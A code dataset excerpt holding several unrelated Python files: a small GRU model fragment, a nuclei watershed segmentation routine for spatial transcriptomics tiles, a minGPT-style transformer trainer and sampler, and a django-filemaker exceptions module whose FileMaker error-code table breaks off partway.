self.mlp = spk.nn.blocks.MLP(hidden_dim, 1, n_layers = mlp_layers)
self.requires_dr = False
mean = torch.FloatTensor([0.0]) if mean is None else mean
stddev = torch.FloatTensor([1.0]) if stddev is None else stddev
self.standardize = spk.nn.base.ScaleShift(mean, stddev)
def forward(self, inputs):
X = inputs['representation']
Xp = self.gru(X)[1]
Xm = self.gru(X[:,[1,0]])[1]
X = (Xp + Xm)[0]
X = self.mlp(X)
X = self.standardize(X)
return {'y': X}
| StarcoderdataPython |
8074773 | from typing import Optional
import histomicstk as htk
import numpy as np
import scipy as sp
import skimage.color
import skimage.io
import skimage.measure
from anndata import AnnData
from scipy import ndimage as ndi
from skimage.feature import peak_local_max
from skimage.segmentation import watershed
from tqdm import tqdm
def morph_watershed(
adata: AnnData,
library_id: str = None,
verbose: bool = False,
copy: bool = False,
) -> Optional[AnnData]:
"""\
Watershed method to segment nuclei and calculate morphological statistics
Parameters
----------
adata
Annotated data matrix.
library_id
Library id stored in AnnData.
copy
Return a copy instead of writing to adata.
Returns
-------
Depending on `copy`, returns or updates `adata` with the following fields.
**n_nuclei** : `adata.obs` field
saved number of nuclei of each spot image tiles
**nuclei_total_area** : `adata.obs` field
saved of total area of nuclei of each spot image tiles
**nuclei_mean_area** : `adata.obs` field
saved mean area of nuclei of each spot image tiles
**nuclei_std_area** : `adata.obs` field
saved stand deviation of nuclei area of each spot image tiles
**eccentricity** : `adata.obs` field
saved eccentricity of each spot image tiles
**mean_pix_r** : `adata.obs` field
saved mean pixel value of red channel of of each spot image tiles
**std_pix_r** : `adata.obs` field
saved stand deviation of red channel of each spot image tiles
**mean_pix_g** : `adata.obs` field
saved mean pixel value of green channel of each spot image tiles
**std_pix_g** : `adata.obs` field
saved stand deviation of green channel of each spot image tiles
**mean_pix_b** : `adata.obs` field
saved mean pixel value of blue channel of each spot image tiles
**std_pix_b** : `adata.obs` field
saved stand deviation of blue channel of each spot image tiles
**nuclei_total_area_per_tile** : `adata.obs` field
saved total nuclei area per tile of each spot image tiles
"""
if library_id is None:
library_id = list(adata.uns["spatial"].keys())[0]
n_nuclei_list = []
nuclei_total_area_list = []
nuclei_mean_area_list = []
nuclei_std_area_list = []
eccentricity_list = []
mean_pix_list_r = []
std_pix_list_r = []
mean_pix_list_g = []
std_pix_list_g = []
mean_pix_list_b = []
std_pix_list_b = []
with tqdm(
total=len(adata),
desc="calculate morphological stats",
bar_format="{l_bar}{bar} [ time left: {remaining} ]",
) as pbar:
for tile in adata.obs["tile_path"]:
(
n_nuclei,
nuclei_total_area,
nuclei_mean_area,
nuclei_std_area,
eccentricity,
solidity,
mean_pix_r,
std_pix_r,
mean_pix_g,
std_pix_g,
mean_pix_b,
std_pix_b,
) = _calculate_morph_stats(tile)
n_nuclei_list.append(n_nuclei)
nuclei_total_area_list.append(nuclei_total_area)
nuclei_mean_area_list.append(nuclei_mean_area)
nuclei_std_area_list.append(nuclei_std_area)
eccentricity_list.append(eccentricity)
mean_pix_list_r.append(mean_pix_r)
std_pix_list_r.append(std_pix_r)
mean_pix_list_g.append(mean_pix_g)
std_pix_list_g.append(std_pix_g)
mean_pix_list_b.append(mean_pix_b)
std_pix_list_b.append(std_pix_b)
pbar.update(1)
adata.obs["n_nuclei"] = n_nuclei_list
adata.obs["nuclei_total_area"] = nuclei_total_area_list
adata.obs["nuclei_mean_area"] = nuclei_mean_area_list
adata.obs["nuclei_std_area"] = nuclei_std_area_list
adata.obs["eccentricity"] = eccentricity_list
adata.obs["mean_pix_r"] = mean_pix_list_r
adata.obs["std_pix_r"] = std_pix_list_r
adata.obs["mean_pix_g"] = mean_pix_list_g
adata.obs["std_pix_g"] = std_pix_list_g
adata.obs["mean_pix_b"] = mean_pix_list_b
adata.obs["std_pix_b"] = std_pix_list_b
adata.obs["nuclei_total_area_per_tile"] = adata.obs["nuclei_total_area"] / 299 / 299
return adata if copy else None
def _calculate_morph_stats(tile_path):
imInput = skimage.io.imread(tile_path)
stain_color_map = htk.preprocessing.color_deconvolution.stain_color_map
stains = [
"hematoxylin", # nuclei stain
"eosin", # cytoplasm stain
"null",
] # set to null if input contains only two stains
w_est = htk.preprocessing.color_deconvolution.rgb_separate_stains_macenko_pca(
imInput, 255
)
# Perform color deconvolution
deconv_result = htk.preprocessing.color_deconvolution.color_deconvolution(
imInput, w_est, 255
)
channel = htk.preprocessing.color_deconvolution.find_stain_index(
stain_color_map[stains[0]], w_est
)
im_nuclei_stain = deconv_result.Stains[:, :, channel]
thresh = skimage.filters.threshold_otsu(im_nuclei_stain)
# im_fgnd_mask = im_nuclei_stain < thresh
im_fgnd_mask = sp.ndimage.morphology.binary_fill_holes(
im_nuclei_stain < 0.8 * thresh
)
distance = ndi.distance_transform_edt(im_fgnd_mask)
coords = peak_local_max(distance, footprint=np.ones((3, 3)), labels=im_fgnd_mask)
mask = np.zeros(distance.shape, dtype=bool)
mask[tuple(coords.T)] = True
markers, _ = ndi.label(mask)
labels = watershed(im_nuclei_stain, markers, mask=im_fgnd_mask)
min_nucleus_area = 60
im_nuclei_seg_mask = htk.segmentation.label.area_open(
labels, min_nucleus_area
).astype(np.int)
# compute nuclei properties
objProps = skimage.measure.regionprops(im_nuclei_seg_mask)
# # Display results
# plt.figure(figsize=(20, 10))
# plt.imshow(skimage.color.label2rgb(im_nuclei_seg_mask, im_nuclei_stain, bg_label=0),
# origin='upper')
# plt.title('Nuclei segmentation mask overlay')
# plt.savefig("./Nuclei_segmentation_tiles_bc_wh/{}.png".format(tile_path.split("/")[-1].split(".")[0]), dpi=300)
n_nuclei = len(objProps)
nuclei_total_area = sum(map(lambda x: x.area, objProps))
nuclei_mean_area = np.mean(list(map(lambda x: x.area, objProps)))
nuclei_std_area = np.std(list(map(lambda x: x.area, objProps)))
mean_pix = imInput.reshape(3, -1).mean(1)
std_pix = imInput.reshape(3, -1).std(1)
eccentricity = np.mean(list(map(lambda x: x.eccentricity, objProps)))
solidity = np.mean(list(map(lambda x: x.solidity, objProps)))
return (
n_nuclei,
nuclei_total_area,
nuclei_mean_area,
nuclei_std_area,
eccentricity,
solidity,
mean_pix[0],
std_pix[0],
mean_pix[1],
std_pix[1],
mean_pix[2],
std_pix[2],
)
| StarcoderdataPython |
1654632 | import torch
import torch.nn.functional as F
from ..models.mingpt import GPT, CGPT, NoiseInjection
from tools.utils import to_cuda
from models import load_network, save_network, print_network
from tqdm import tqdm
from ..modules.vmf import nll_vMF
class Transformer(torch.nn.Module):
def __init__(self, opt, is_train=True, is_main=True, logger=None):
super().__init__()
self.opt = opt
self.is_main = is_main
self.net_t = self.initialize_networks(is_train)
if is_train:
self.opt_t = self.create_optimizers(self.opt)
self.logger = logger if self.is_main else None
height, width = self.opt.z_shape
self.size = height * width
self.state_size = self.opt.state_size
self.tot_size = self.size + self.state_size
def forward(self, data, prefix='', mode='', total_len=None, log=False, global_iter=None, show_progress=False):
code, state_code, cond_code, delta_length_cond, vid_lbl = self.preprocess_input(data)
if mode == 'transformer':
t_loss = self.compute_transformer_loss(code, state_code, cond_code, delta_length_cond, vid_lbl, prefix, log, global_iter)
return t_loss
if mode == 'eval_transformer':
with torch.no_grad():
t_loss = self.compute_transformer_loss(code, log, global_iter, is_eval=True)
return t_loss
if mode == 'inference':
return self.generate_fake(code, state_code, cond_code, delta_length_cond, vid_lbl, total_len, show_progress)
else:
raise ValueError(f"mode '{mode}' is invalid")
def preprocess_input(self, data):
data["code"] = to_cuda(data, "code", flatten_empty=False)
data["state_code"] = to_cuda(data, "state_code", flatten_empty=False)
data["cond_code"] = to_cuda(data, "cond_code")
data["vid_lbl"] = to_cuda(data, "vid_lbl")
data["delta_length_cond"] = to_cuda(data, "delta_length_cond")
return data["code"], data["state_code"], data["cond_code"], data["delta_length_cond"], data["vid_lbl"]
def initialize_networks(self, is_train):
if self.opt.is_continuous:
net_t = CGPT(n_proposals=self.opt.n_proposals, block_size=self.opt.z_len, n_layer=self.opt.n_layer,
n_head=self.opt.n_head, n_embd=self.opt.n_embd, n_in=self.opt.n_in,
resid_noise=self.opt.resid_noise).cuda()
else:
num_lbl = len(self.opt.categories) if self.opt.categories is not None else None
net_t = GPT(vocab_size=self.opt.z_num, block_size=self.opt.z_len, n_layer=self.opt.n_layer,
n_head=self.opt.n_head, n_embd=self.opt.n_embd, emb_mode=self.opt.emb_mode,
shape=self.opt.z_shape, state_vocab_size=self.opt.state_num, num_blocks=self.opt.num_blocks,
state_size=self.opt.state_size, use_start_token=self.opt.use_start_token, use_lbl=self.opt.cat,
num_lbl=num_lbl, state_front=self.opt.state_front).cuda()
if self.is_main:
net_t = load_network(net_t, "transformer_t", self.opt, head_to_n=self.opt.head_to_n)
return net_t
def save_model(self, global_iter, latest=False, best=False):
save_network(self.net_t, "transformer_t", global_iter, self.opt, latest, best)
# Following minGPT:
# This long function is unfortunately doing something very simple and is being very defensive:
# We are separating out all parameters of the model into two buckets: those that will experience
# weight decay for regularization and those that won't (biases, and layernorm/embedding weights).
# We are then returning the PyTorch optimizer object.
def create_optimizers(self, opt):
param_dict = {pn: p for pn, p in self.net_t.named_parameters()}
if opt.finetune_head and opt.finetune_f is None:
optim_groups = [{"params": [param_dict["head.weight"]], "weight_decay": 0.01, "lr": opt.lr}]
else:
# separate out all parameters to those that will and won't experience regularizing weight decay
decay = set()
no_decay = set()
whitelist_weight_modules = (torch.nn.Linear,)
blacklist_weight_modules = (torch.nn.LayerNorm, torch.nn.Embedding, NoiseInjection)
for mn, m in self.net_t.named_modules():
for pn, p in m.named_parameters():
fpn = '%s.%s' % (mn, pn) if mn else pn # full param name
if pn.endswith('bias'):
# all biases will not be decayed
no_decay.add(fpn)
elif pn.endswith('weight') and isinstance(m, whitelist_weight_modules):
# weights of whitelist modules will be weight decayed
decay.add(fpn)
elif pn.endswith('weight') and isinstance(m, blacklist_weight_modules):
# weights of blacklist modules will NOT be weight decayed
no_decay.add(fpn)
# special case the position embedding parameter in the root GPT module as not decayed
no_decay.add('start_tok_emb') if 'start_tok_emb' in param_dict.keys() else None
no_decay.add('pos_emb') if 'pos_emb' in param_dict.keys() else None
no_decay.add('h_emb') if 'h_emb' in param_dict.keys() else None
no_decay.add('w_emb') if 'w_emb' in param_dict.keys() else None
no_decay.add('s_emb') if 's_emb' in param_dict.keys() else None
no_decay.add('t_emb') if 't_emb' in param_dict.keys() else None
no_decay.add('state_pos_emb') if 'state_pos_emb' in param_dict.keys() else None
no_decay.add('state_s_emb') if 'state_s_emb' in param_dict.keys() else None
# validate that we considered every parameter
inter_params = decay & no_decay
union_params = decay | no_decay
assert len(inter_params) == 0, "parameters %s made it into both decay/no_decay sets!" % (str(inter_params),)
assert len(param_dict.keys() - union_params) == 0, "parameters %s were not separated into either decay/no_decay set!" % (str(param_dict.keys() - union_params),)
# create the pytorch optimizer object
if opt.finetune_head:
optim_groups = [{"params": [param_dict[pn] for pn in sorted(list(decay)) if pn != "head.weight"], "weight_decay": 0.01, "lr": opt.lr * opt.finetune_f},
{"params": [param_dict["head.weight"]], "weight_decay": 0.01, "lr": opt.lr},
{"params": [param_dict[pn] for pn in sorted(list(no_decay))], "weight_decay": 0.0, "lr": opt.lr * opt.finetune_f}]
else:
optim_groups = [{"params": [param_dict[pn] for pn in sorted(list(decay))], "weight_decay": 0.01, "lr": opt.lr},
{"params": [param_dict[pn] for pn in sorted(list(no_decay))], "weight_decay": 0.0, "lr": opt.lr}]
if opt.optimizer == "adamw":
opt_t = torch.optim.AdamW(optim_groups, betas=(opt.beta1, opt.beta2))
else:
raise NotImplementedError
return opt_t
def compute_transformer_loss(self, code, state_code, cond_code, delta_length_cond, vid_lbl, prefix, log, global_iter, is_eval=False):
code = code[:, :self.opt.z_len] # limit input to transformer capacity
state_nll_loss = None
if self.opt.is_continuous:
if self.opt.p2p:
pred = self.net_t(code[:, :-1], cond_code, delta_length_cond, lbl_idx=vid_lbl)
else:
pred = self.net_t(code[:, :-1], lbl_idx=vid_lbl)
tgt = code[:, 1:]
vmf_loss = None
other_vmf_loss = None
cosine_loss = None
other_cosine_loss = None
# nll_loss = None
nll_loss = F.mse_loss(pred, tgt)
t_loss = nll_loss
# if self.opt.n_proposals > 1:
# t_loss = torch.tensor(0., requires_grad=True).cuda()
# logits, proposals = pred
# nm_proposals = proposals / torch.norm(proposals, p=2, dim=3, keepdim=True) if self.opt.normalize_pred else proposals
# nm_tgt = tgt / torch.norm(tgt, p=2, dim=2, keepdim=True) if self.opt.normalize_tgt else tgt
# cosine_dist = - (nm_proposals * nm_tgt.unsqueeze(2)).sum(dim=3)
# closest_proposals = cosine_dist.argmin(dim=2, keepdim=True)
# nll_loss = F.cross_entropy(logits.view(-1, logits.size(-1)), closest_proposals.view(-1))
# t_loss += nll_loss
# if self.opt.knn is not None:
# k_closest = max(1, int(self.opt.knn * (1 - global_iter / self.opt.knn_decay_iter)))
# closest_proposals = (-cosine_dist).topk(dim=2, k=k_closest)[1]
# else:
# k_closest = 1
# closest_onehot = torch.zeros(*closest_proposals.shape[:2], self.opt.n_proposals).cuda().scatter_(2, closest_proposals, 1)
# if self.opt.continuous_loss == "cosine":
# pred = nm_proposals[closest_onehot.bool()].view(*nm_proposals.shape[:2], k_closest, -1)
# cosine_loss = - (pred * tgt.unsqueeze(2)).sum(dim=3).mean()
# if self.opt.knn is not None:
# t_loss += cosine_loss
# else:
# other_preds = nm_proposals[~closest_onehot.bool()].view(*nm_proposals.shape[:2], self.opt.n_proposals - k_closest, -1)
# other_cosine_loss = - (other_preds * tgt.unsqueeze(2)).sum(dim=3).mean()
# t_loss += (1 - self.opt.epsilon_other) * cosine_loss + self.opt.epsilon_other * other_cosine_loss
# elif self.opt.continuous_loss == "vmf":
# pred = proposals[closest_onehot.bool()].view(*nm_proposals.shape[:2], k_closest, -1)
# vmf_loss = nll_vMF(pred, tgt.unsqueeze(2))
# if self.opt.knn is not None:
# t_loss += vmf_loss
# else:
# other_preds = proposals[~closest_onehot.bool()].view(*nm_proposals.shape[:2], self.opt.n_proposals - k_closest, -1)
# other_vmf_loss = nll_vMF(other_preds, tgt.unsqueeze(2))
# t_loss += (1 - self.opt.epsilon_other) * vmf_loss + self.opt.epsilon_other * other_vmf_loss
#
# else:
# if self.opt.continuous_loss == "cosine":
# if self.opt.normalize_pred:
# pred = pred / torch.norm(pred, p=2, dim=2, keepdim=True)
# if self.opt.normalize_tgt:
# tgt = tgt / torch.norm(tgt, p=2, dim=2, keepdim=True)
# cosine_loss = - (pred * tgt).sum(dim=2).mean()
# t_loss = cosine_loss
# elif self.opt.continuous_loss == "vmf":
# vmf_loss = nll_vMF(pred, tgt)
# t_loss = vmf_loss
nrec_loss = None
nrec_momentum_loss = None
else:
logits = self.net_t(code[:, :-1], cond_idx=cond_code, state_idx=state_code, delta_length_cond=delta_length_cond, lbl_idx=vid_lbl)
if 0 not in state_code.size():
if self.opt.state_front:
state_i = [i for i in range(logits.size(1)) if (i + 1) < self.state_size * self.opt.num_blocks]
frame_i = [i for i in range(logits.size(1)) if (i + 1) >= self.state_size * self.opt.num_blocks]
else:
state_i = [i for i in range(logits.size(1)) if (i + 1) % self.tot_size < self.state_size]
frame_i = [i for i in range(logits.size(1)) if (i + 1) % self.tot_size >= self.state_size]
state_logits = logits[:, state_i, :self.opt.state_num]
logits = logits[:, frame_i]
target = code
else:
if self.opt.use_start_token or self.opt.cat:
target = code
else:
target = code[:, 1:]
nll_loss = F.cross_entropy(logits.reshape(-1, logits.size(-1)), target.reshape(-1))
nrec_loss = None
other_vmf_loss = None
cosine_loss = None
other_cosine_loss = None
nrec_momentum_loss = None
vmf_loss = None
t_loss = nll_loss
if 0 not in state_code.size():
state_nll_loss = F.cross_entropy(state_logits.reshape(-1, state_logits.size(-1)), state_code[:, 1:].reshape(-1))
t_loss += state_nll_loss
if self.logger and not is_eval:
# log scalars every step
self.logger.log_scalar(f"transformer/{prefix}nll", nll_loss, global_iter)
self.logger.log_scalar(f"transformer/{prefix}state_nll", state_nll_loss, global_iter)
self.logger.log_scalar(f"transformer/{prefix}cosine", cosine_loss, global_iter)
self.logger.log_scalar(f"transformer/{prefix}other_cosine", other_cosine_loss, global_iter)
self.logger.log_scalar(f"transformer/{prefix}vmf", vmf_loss, global_iter)
self.logger.log_scalar(f"transformer/{prefix}other_vmf", other_vmf_loss, global_iter)
self.logger.log_scalar(f"transformer/{prefix}nrec", nrec_loss, global_iter)
self.logger.log_scalar(f"transformer/{prefix}nrec_momentum", nrec_momentum_loss, global_iter)
return t_loss
def top_k_logits(self, logits, k):
v, _ = torch.topk(logits, k)
out = logits.clone()
out[out < v[..., [-1]]] = -float('Inf')
return out
@torch.no_grad()
def generate_fake(self, code, state_code, cond_code, delta_length_cond, vid_lbl, total_len, show_progress):
''' If 'total_len' is 'None' generate tokens with transformer until the capacity 'z_len' of the transformer has
been reached. Otherwise, fill the code until 'total_len' is reached with a 'z_chunk' stride.
'''
if total_len is None:
code, state_code = self.fill_code(code, state_code, cond_code, delta_length_cond, vid_lbl, show_progress=show_progress)
return {"code": code, "state_code": state_code}
if total_len <= self.opt.z_len:
add_len = total_len - code.size(1)
add_len -= cond_code.size(1) if 0 not in cond_code.size() else 0
add_len -= min(state_code.size(1), self.opt.state_size * self.opt.num_blocks) if 0 not in state_code.size() else 0
code, state_code = self.fill_code(code, state_code, cond_code, delta_length_cond, vid_lbl, add_len=add_len, show_progress=show_progress)
return {"code": code, "state_code": state_code}
if show_progress:
pbar = tqdm(total=int(total_len), desc="Processing codes")
# 1. fill until transformer capacity 'z_len' is reached
code, state_code = self.fill_code(code, state_code, cond_code, delta_length_cond, vid_lbl, show_progress=show_progress)
# 2. predict 'z_chunk' by 'z_chunk'
curr_len = self.opt.z_len
if show_progress:
pbar.update(curr_len)
i = 1
while curr_len < total_len:
add_len = total_len - curr_len if total_len - curr_len < self.opt.z_chunk else None
if 0 not in cond_code.size():
delta_length_cond -= 1
# free some capacity for one chunk
tmp_state_code = state_code[:, i * self.state_size:] if 0 not in state_code.size() else state_code
tmp_code = code[:, i * self.size:]
# predict one chunk
pred_code, pred_state_code = self.fill_code(tmp_code, tmp_state_code, cond_code, delta_length_cond, vid_lbl, add_len=add_len, show_progress=show_progress)
# update code
delta_code = pred_code.size(1) - tmp_code.size(1)
code = torch.cat([code, pred_code[:, -delta_code:]], dim=1)
if 0 not in state_code.size():
delta_state_code = pred_state_code.size(1) - tmp_state_code.size(1)
if delta_state_code > 0:
state_code = torch.cat([state_code, pred_state_code[:, -delta_state_code:]], dim=1)
# else:
# curr_len += self.state_size
# keep track of progress
curr_len += add_len if add_len is not None else self.opt.z_chunk
if show_progress:
# if add_len is not None:
# print("add_len", add_len)
# else:
# print("z_chunk", self.opt.z_chunk)
pbar.update(add_len if add_len is not None else self.opt.z_chunk)
i += 1
if show_progress:
pbar.close()
return {"code": code, "state_code": state_code}
def fill_code(self, code, state_code, cond_code, delta_length_cond, vid_lbl, add_len=None, show_progress=False):
bs = code.size(0)
log_p = None
# compute add_len
if add_len is None:
add_len = self.opt.z_len - code.size(1)
add_len -= cond_code.size(1) if 0 not in cond_code.size() else 0
add_len -= min(state_code.size(1), self.opt.state_size * self.opt.num_blocks) if 0 not in state_code.size() else 0
# iterate
pbar = tqdm(range(add_len), desc="Filling codes", leave=False) if show_progress else range(add_len)
for _ in pbar:
if self.opt.is_continuous:
pred = self.net_t(code, single=True)
if self.opt.normalize_pred:
pred = pred / torch.norm(pred, p=2, dim=2, keepdim=True)
code = torch.cat((code, pred), dim=1)
else:
logits = self.net_t(code, cond_idx=cond_code, state_idx=state_code, delta_length_cond=delta_length_cond, lbl_idx=vid_lbl)
# determine if prediction needs to be affected to code or state_code
is_state = 0 not in state_code.size() and logits.size(1) % self.tot_size < self.state_size
if is_state:
logits = logits[:, :, :self.opt.state_num]
icode = self.get_icode(logits, self.opt.temperature_state, self.opt.top_k_state, self.opt.sample_state)[0]
state_code = torch.cat((state_code, icode), dim=1)
else:
if self.opt.beam_size is not None:
if code.size(0) == bs:
# expand
code = code.unsqueeze(1).repeat(1, self.opt.beam_size, 1).view(bs * self.opt.beam_size, -1)
icode, ilog_p = self.get_icode(logits, self.opt.temperature, self.opt.top_k, self.opt.sample, n=self.opt.beam_size)
log_p = ilog_p
icode = icode.view(-1, 1)
else:
if not self.opt.no_sample:
icode, ilog_p = self.get_icode(logits, self.opt.temperature, self.opt.top_k, self.opt.sample, n=1)
log_p += ilog_p.view(bs, self.opt.beam_size)
icode = icode.view(-1, 1)
else:
# expand
icode, ilog_p = self.get_icode(logits, self.opt.temperature, self.opt.top_k, self.opt.sample, n=self.opt.beam_size)
log_p = log_p.unsqueeze(1).repeat(1, self.opt.beam_size, 1)
log_p += ilog_p.view(bs, self.opt.beam_size, self.opt.beam_size)
icode = icode.view(bs, self.opt.beam_size * self.opt.beam_size)
log_p = log_p.view(bs, self.opt.beam_size * self.opt.beam_size)
# prune
log_p, keep = torch.topk(log_p, dim=1, k=self.opt.beam_size)
icode = torch.gather(icode, dim=1, index=keep).view(-1, 1)
code = code.unsqueeze(1).repeat(1, self.opt.beam_size, 1).view(bs, self.opt.beam_size * self.opt.beam_size, -1)
keep = keep.unsqueeze(-1).repeat(1, 1, code.size(-1))
code = torch.gather(code, dim=1, index=keep).view(-1, code.size(-1))
else:
icode = self.get_icode(logits, self.opt.temperature, self.opt.top_k, self.opt.sample)[0]
code = torch.cat((code, icode), dim=1)
if self.opt.beam_size is not None:
# keep best hypothesis
_, best = torch.topk(log_p, dim=1, k=1)
code = code.view(bs, self.opt.beam_size, -1)
best = best.unsqueeze(-1).repeat(1, 1, code.size(-1))
code = torch.gather(code, dim=1, index=best).view(bs, code.size(-1))
return code, state_code
def get_icode(self, logits, temperature, top_k, sample, n=1):
# pluck the logits at the final step and scale by temperature
logits = logits[:, -1] / temperature
# optionally crop probabilities to only the top k options
if top_k is not None:
logits = self.top_k_logits(logits, top_k)
# apply softmax to convert to probabilities
probs = F.softmax(logits, dim=-1)
# sample from the distribution or take the most likely
if sample:
icode = torch.multinomial(probs, num_samples=n)
else:
_, icode = torch.topk(probs, k=n, dim=-1)
ilog_p = torch.log(torch.gather(probs, 1, icode))
return icode, ilog_p | StarcoderdataPython |
5140489 | <reponame>TitanEntertainmentGroup/django-filemaker
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.core.exceptions import ValidationError
__all__ = ['FileMakerError', 'FileMakerValidationError',
'FileMakerObjectDoesNotExist', 'FileMakerConnectionError',
'FileMakerServerError']
class FileMakerError(Exception):
'''
This is the base exception related to FileMaker operations. All other
exceptions here inherit from it.
'''
pass
class FileMakerValidationError(FileMakerError, ValidationError):
'''
Raised when a FileMaker field fails validation. The same as Django's
``django.core.exceptions.ValidationError`` (from which it inherits).
When raised by a field, the field raising it will be available on the
exception as the ``field`` attribute.
'''
def __init__(self, *args, **kwargs):
self.field = kwargs.pop('field', None)
return super(FileMakerValidationError, self).__init__(*args, **kwargs)
class FileMakerObjectDoesNotExist(FileMakerError):
'''
Raised when no :py:class:`FileMakerModel` instance matching a query is
found.
Every :py:class:`FileMakerModel` has a sub-class of this as `DoesNotExist`
enabling you to catch exceptions raised by a specific model.
'''
pass
class FileMakerConnectionError(FileMakerError):
'''
Raised when an HTTP or other error is encountered when attempting to
connect to the FileMaker server.
'''
pass
class FileMakerServerError(FileMakerError):
'''
Indicates an error returned by FileMaker. This is raised by the result
parser and in turn by the FileMaker managers.
The exact FileMaker error code is available on the exception as the
``code`` attribute, and the corresponding text representation of the error
is on the ``message`` attribute.
'''
error_codes = {
-1: 'Unknown error',
0: 'Non FileMaker error',
1: 'User canceled action',
2: 'Memory error',
3: 'Command is unavailable (for example, wrong operating system, '
'wrong mode, etc.)',
4: 'Command is unknown',
5: 'Command is invalid (for example, a Set Field script step does '
'not have a calculation specified)',
6: 'File is read-only',
7: 'Running out of memory',
8: 'Empty result',
9: 'Insufficient privileges',
10: 'Requested data is missing',
11: 'Name is not valid',
12: 'Name already exists',
13: 'File or object is in use',
14: 'Out of range',
15: 'Can\'t divide by zero',
16: 'Operation failed, request retry (for example, a user query)',
17: 'Attempt to convert foreign character set to UTF-16 failed',
18: 'Client must provide account information to proceed',
19: 'String contains characters other than A-Z, a-z, 0-9 (ASCII)',
100: 'File is missing',
101: 'Record is missing',
102: 'Field is missing',
103: 'Relationship is missing',
104: 'Script is missing',
105: 'Layout is missing',
106: 'Table is missing',
107: 'Index is missing',
108: 'Value list is missing',
109: 'Privilege set is missing',
110: 'Related tables are missing',
111: 'Field repetition is invalid',
112: 'Window is missing',
113: 'Function is missing',
114: 'File reference is missing',
130: 'Files are damaged or missing and must be reinstalled',
131: 'Language pack files are missing (such as template files)',
200: 'Record access is denied',
201: 'Field cannot be modified',
202: 'Field access is denied',
203: 'No records in file to print, or password doesn\'t allow print '
'access',
204: 'No access to field(s) in sort order',
205: 'User does not have access privileges to create new records; '
'import will overwrite existing data',
206: 'User does not have password change privileges, or file is '
'not modifiable',
207: 'User does not have sufficient privileges to change database '
'schema, or file is not modifiable',
208: 'Password does not contain enough characters',
209: 'New password must be different from existing one',
210: 'User account is inactive',
211: 'Password has expired',
212: 'Invalid user account and/or password. Please try again',
213: 'User account and/or password does not exist',
214: 'Too many login attempts',
215: 'Administrator privileges cannot be duplicated',
216: 'Guest account cannot be duplicated',
217: 'User does not have sufficient privileges to modify '
'administrator account',
300: 'File is locked or in use',
301: 'Record is in use by another user',
302: 'Table is in use by another user',
303: 'Database schema is in use by another user',
304: 'Layout is inMa use by another user',
306: 'Record modification ID does not match',
400: 'Find criteria are empty',
401: 'No records matMach the request',
402: 'Selected field is not a match field for a lookup',
403: 'Exceeding maximum record limit for trial version of '
'FileMaker(tm)) Pro',
404: 'Sort order is invalid',
405: 'Number of records specified exceeds number of records that '
'can be omitted',
406: 'Replace/Reserialize criteria are invalid',
407: 'One or both match fields are missing (invalid relationship)',
408: 'Specified field has inappropriate data type for this operation',
409: 'Import order is invalid',
410: 'Export order is invalid',
412: 'Wrong version of FileMaker(tm) Pro used to recover file',
413: 'Specified field has inappropriate field type',
414: 'Layout cannot display the result',
415: 'Related Record Required',
500: 'Date value does not meet validation entry options',
501: 'Time value does not meet validation entry options',
502: 'Number value does not meet validation entry options',
503: 'Value in field is not within the range specified in '
'validation entry options',
504: 'Value in field is not unique as required in validation '
'entry options',
505: 'Value in field is not an existing value in the database '
'file as required in validation entry options',
506: 'Value in field is not listed on the value list specified '
'in validation entry option',
507: 'Value in field failed calculation test of validation entry '
'option',
508: 'Invalid value entered in Find mode',
509: 'Field requires a valid value',
510: 'Related value is empty or unavailable',
511: 'Value in field exceeds maximum number of allowed characters',
600: 'Print error has occurred',
601: 'Combined header and footer exceed one page',
602: 'Body doesn\'t fit on a page for current column setup',
603: 'Print connection lost',
700: 'File is of the wrong file type for import',
706: 'EPSF file has no preview image',
707: 'Graphic translator cannot be found',
708: 'Can\'t import the file or need color monitor support to '
'import file',
709: 'QuickTime movie import failed',
710: 'Unable to update QuickTime file reference because the '
'database file is read-only',
711: 'Import translator cannot be found',
714: 'Password privileges do not allow the operation',
715: 'Specified Excel worksheet or named range is missing',
716: 'A SQL query using DELETE, INSERT, or UPDATE is not allowed '
'for ODBC import',
717: 'There is not enough XML/XSL information to proceed with the '
'import or export',
718: 'Error in parsing XML file (from Xerces)',
719: 'Error in transforming XML using XSL (from Xalan)',
720: 'Error when exporting; intended format does not support '
'repeating fields',
721: 'Unknown error occurred in the parser or the transformer',
722: 'Cannot import data into a file that has no fields',
723: 'You do not have permission to add records to or modify '
'records in the target table',
724: 'You do not have permission to add records to the target table',
725: 'You do not have permission to modify records in the '
'target table',
726: 'There are more records in the import file than in the '
'target table. Not all records were imported',
727: 'There are more records in the target table than in the '
'import file. Not all records were updated',
729: 'Errors occurred during import. Records could not be imported',
730: 'Unsupported Excel version. (Convert file to Excel 7.0 '
'(Excel 95), Excel 97, 2000, or XP format and try again)',
731: 'The file you are importing from contains no data',
732: 'This file cannot be inserted because it contains other files',
733: 'A table cannot be imported into itself',
734: 'This file type cannot be displayed as a picture',
735: 'This file type cannot be displayed as a picture. It will be '
'inserted and displayed as a file 800 Unable to create file '
'on disk',
801: 'Unable to create temporary file on System disk',
802: 'Unable to open file',
803: 'File is single user or host cannot be found',
804: 'File cannot be opened as read-only in its current state',
805: 'File is damaged; use Recover command',
806: 'File cannot be opened with this version of FileMaker(tm) Pro',
807: 'File is not a FileMaker(tm) Pro file or is severely damaged',
808: 'Cannot open file because access privileges are damaged',
809: 'Disk/volume is full',
810: 'Disk/volume is locked',
811: 'Temporary file cannot be opened as FileMaker(tm) Pro file',
813: 'Record Synchronization error on network',
814: 'File(s) cannot be opened because maximum number is open',
815: 'Couldn\'t open lookup file',
816: 'Unable to convert file',
817: 'Unable to open file because it does not belong to this solution',
819: 'Cannot save a local copy of a remote file',
820: 'File is in the process of being closed',
821: 'Host forced a disconnect',
822: 'FMI files not found; reinstall missing files',
823: 'Cannot set file to single-user, guests are connected',
824: 'File is damaged or not a FileMaker(tm) file',
900: 'General spelling engine error',
901: 'Main spelling dictionary not installed',
902: 'Could not launch the Help system',
903: 'Command cannot be used in a shared file',
904: 'Command can only be used in a file hosted under '
'FileMaker(tm) Server',
905: 'No active field selected; command can only be used if there '
'is an active field',
920: 'Can\'t initialize the spelling engine',
921: 'User dictionary cannot be loaded for editing',
922: 'User dictionary cannot be found',
923: 'User dictionary is read-only',
951: 'An unexpected error occurred (returned only by '
'web-published databases)',
954: 'Unsupported XML grammar (returned only by '
'web-published databases)',
955: 'No database name (returned only by web-published databases)',
956: 'Maximum number of database sessions exceeded (returned '
'only by web-published databases)',
957: 'Conflicting commands (returned only by web-published databases)',
